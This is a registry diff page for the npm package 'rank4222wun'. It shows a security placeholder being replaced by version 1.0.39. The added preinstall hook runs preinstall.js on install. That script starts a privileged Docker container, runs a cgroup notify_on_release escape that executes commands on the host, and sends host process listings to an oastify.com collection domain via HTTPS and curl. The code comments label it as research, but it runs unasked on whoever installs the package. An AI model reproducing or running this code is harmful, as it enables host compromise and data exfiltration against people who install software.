npm - rank4222wun - Versions diffs - 0.0.1-security → 1.0.39 - Mend

rank4222wun 0.0.1-security → 1.0.39

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rank4222wun might be problematic. Click here for more details.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.39",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,178 @@
+// privileged-container-escape-oast.js
+const { spawn } = require('child_process');
+const crypto = require('crypto');
+const https = require('https');
+const OAST_DOMAIN = 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com';
+console.log(`
+╔════════════════════════════════════════════════════╗
+║    PRIVILEGED CONTAINER ESCAPE + OAST REPORTING    ║
+║                                                    ║
+║  OAST Domain : ${OAST_DOMAIN}                      ║
+╚════════════════════════════════════════════════════╝
+`);
+function generateSessionId() {
+  const timestamp = Date.now();
+  const random = crypto.randomBytes(6).toString('hex');
+  return `escape-${timestamp}-${random}`;
+}
+const sessionId = generateSessionId();
+const uniqueSub = crypto.randomBytes(4).toString('hex'); // لـ subdomain فريد
+console.log(`Session ID       : ${sessionId}`);
+console.log(`Unique subdomain : ${uniqueSub}.${sessionId}.${OAST_DOMAIN}\n`);
+function sendHttpsBeacon(path = '/escape-report', extraData = {}) {
+  const data = JSON.stringify({
+    session: sessionId,
+    ts: new Date().toISOString(),
+    type: 'escape-beacon',
+    ...extraData
+  });
+  const options = {
+    hostname: OAST_DOMAIN,
+    port: 443,
+    path: path,
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data),
+      'User-Agent': 'ContainerEscapeTest/1.0',
+      'X-Session': sessionId
+    }
+  };
+  const req = https.request(options, (res) => {
+    console.log(`[HTTPS Beacon] Status: ${res.statusCode} for ${path}`);
+  });
+  req.on('error', (e) => {
+    console.log(`[Beacon Error] ${e.message}`);
+  });
+  req.write(data);
+  req.end();
+  console.log(`→ HTTPS beacon sent to https://${OAST_DOMAIN}${path}`);
+}
+// إرسال إشارة بداية من الـ host
+sendHttpsBeacon('/start', { action: 'script_started', privileged: true });
+// ────────────────────────────────────────────────
+console.log(`
+جاري تشغيل الحاوية المميزة (privileged) لمحاولة الـ escape إلى الـ host...
+ملاحظات أمنية مهمة:
+- هذا الكود لأغراض تعليمية/اختبارية فقط (pentesting/research).
+- يتطلب صلاحيات root أو docker group على الـ host.
+- استخدم في بيئة معزولة (VM) لتجنب مخاطر.
+- الـ escape يعتمد على cgroup v1 (notify_on_release) - قد لا يعمل في cgroup v2-only systems.
+- إذا لم يعمل، تأكد من أن الـ host يدعم rdma cgroup.
+الكود سينفذ PoC escape تلقائياً داخل الحاوية:
+- يستخدم cgroup notify_on_release لتشغيل أمر على الـ host (مثل ps aux > /output).
+- يرسل إشارات OAST (DNS + HTTPS) من داخل الحاوية لتأكيد الـ escape.
+- بعد الـ escape، تحقق من /output على الـ host للدليل.
+جاري التشغيل...
+`);
+// ────────────────────────────────────────────────
+// سكريبت الـ escape PoC (بناءً على Trail of Bits PoC + تحسينات)
+// يثبت curl للـ OAST، ينفذ escape، يرسل beacons
+const escapeScript = `
+apt update -qq && apt install -y curl net-tools 2>/dev/null || true
+echo "=== STARTING ESCAPE ATTEMPT ==="
+# إرسال DNS beacon من داخل الحاوية
+nslookup ${uniqueSub}.${sessionId}.${OAST_DOMAIN} || ping -c 1 -W 1 ${uniqueSub}.${sessionId}.${OAST_DOMAIN} || true
+# إرسال HTTPS beacon من داخل الحاوية
+curl -s -X POST "https://${OAST_DOMAIN}/container-beacon" -d "{\\"session\\":\\"${sessionId}\\",\\"from\\":\\"container\\",\\"action\\":\\"started\\"}" || true
+# PoC Escape باستخدام cgroup notify_on_release (cgroup v1)
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=\`sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab\`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+echo '#!/bin/sh' > /cmd
+# أمر ينفذ على الـ host: ps aux + إرسال OAST beacon إذا أمكن
+echo "ps aux > $host_path/output" >> /cmd
+echo "curl -s -X POST 'https://${OAST_DOMAIN}/host-beacon' -d '{\\"session\\":\\"${sessionId}\\",\\"from\\":\\"host\\",\\"action\\":\\"escaped\\",\\"host_ps\\":\\"'$(ps aux | head -5)'\\"}' || true" >> /cmd
+chmod a+x /cmd
+sh -c "echo \\$\\$ > /tmp/cgrp/x/cgroup.procs"
+echo "=== ESCAPE ATTEMPT COMPLETE ==="
+# إرسال beacon نهاية من داخل الحاوية
+curl -s -X POST "https://${OAST_DOMAIN}/container-end" -d "{\\"session\\":\\"${sessionId}\\",\\"action\\":\\"escape_attempted\\"}" || true
+# الانتظار قليلاً للـ output
+sleep 5
+# محاولة قراءة /output إذا نجح الـ escape (قد لا يعمل إذا لم يتم الـ escape كامل)
+cat /output 2>/dev/null || echo "No access to /output from container (expected if escape succeeded)"
+echo "=== CONTAINER EXITING ==="
+`;
+const dockerArgs = [
+  'run',
+  '--privileged',
+  '--rm',
+  '--name', `escape-test-${sessionId.slice(0,12)}`,
+  'ubuntu:latest',
+  'bash', '-c', escapeScript
+];
+const container = spawn('docker', dockerArgs, {
+  stdio: 'inherit'
+});
+container.on('error', (err) => {
+  console.error(`خطأ في تشغيل docker: ${err.message}`);
+  process.exit(1);
+});
+container.on('close', (code) => {
+  console.log(`\nالحاوية انتهت (exit code: ${code})\n`);
+  // إشارة نهاية من الـ host
+  sendHttpsBeacon('/end', {
+    action: 'script_ended',
+    exit_code: code,
+    escape_attempt: 'completed'
+  });
+  console.log(`\nتحقق من الـ host للدليل على الـ escape:`);
+  console.log(`  cat /output  # (يحتوي على ps aux من الـ host إذا نجح)`);
+  console.log(`\nتحقق من لوحة الـ OAST الخاصة بك على:`);
+  console.log(`  https://${OAST_DOMAIN}`);
+  console.log(`  ابحث عن: ${sessionId}`);
+  console.log(`  أو subdomain: ${uniqueSub}.${sessionId}.${OAST_DOMAIN}\n`);
+  console.log(`إذا لم يعمل الـ escape، جرب:`);
+  console.log(`- التأكد من cgroup v1 مفعل (echo 1 > /sys/fs/cgroup/unified/cgroup.subtree_control أو استخدم --cgroupns=host)`);
+  console.log(`- إضافة --cap-add=ALL إلى docker run`);
+});
+// التعامل مع Ctrl+C
+process.on('SIGINT', () => {
+  console.log('\nإغلاق...');
+  container.kill('SIGINT');
+  setTimeout(() => process.exit(0), 1500);
+});

package/rank4222wun-1.0.39.tgz ADDED Viewed

Binary file

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.